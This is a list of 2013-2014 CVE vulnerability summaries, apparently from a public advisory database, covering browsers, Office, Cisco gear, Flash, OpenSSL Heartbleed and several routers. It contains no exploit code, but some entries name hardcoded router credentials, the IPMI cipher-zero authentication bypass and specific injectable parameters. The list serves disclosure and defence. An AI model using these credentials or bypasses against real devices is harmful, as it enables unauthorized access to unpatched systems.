CVE-2013-3064: Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.

CVE-2013-3116: Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3137: Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability."

CVE-2013-3194: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3199: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3201: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3206: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3280: EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.

CVE-2013-3387: Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.

CVE-2013-3417: The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.

CVE-2013-3632: The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.

CVE-2013-3656: Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.

CVE-2013-3856: Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."

CVE-2013-3860: Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability."

CVE-2013-3893: Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.

CVE-2013-3897: Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3900: The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability."

CVE-2013-3905: Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability."

CVE-2013-4223: The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.

CVE-2013-4436: The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.

CVE-2013-4478: Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.

CVE-2013-4529: Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.

CVE-2013-4555: Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.

CVE-2013-4776: NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to filesystem.

CVE-2013-4782: The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.

CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability."

CVE-2013-5369: IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.

CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.

CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.

CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.

CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.

CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.

CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.

CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.

CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.

CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.

CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.

CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.

CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.

CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability."

CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.

CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.

CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.

CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.

CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.

CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.

CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.

CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.

CVE-2013-7389: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.

CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.

CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.

CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability".

CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability".

CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability".

CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-0321.

CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.

CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.

CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.

CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.

CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.

CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.

CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.

CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.

CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.

CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.

CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)".

CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion", a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.

CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.

CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.

CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.

CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.

CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.

CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.

CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.

CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.

CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.

CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOM::SVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.

CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.

CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.

CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget.dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.

CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.

CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.

CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability".

CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability".

CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability".

CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability".

CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.

CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.

CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.

CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.

CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.

CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.

CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.

CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.

CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2773.

CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.

CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2788.

CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.

CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.

CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.

CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.

CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.

CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.

CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.

CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.

CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.

CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.

CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

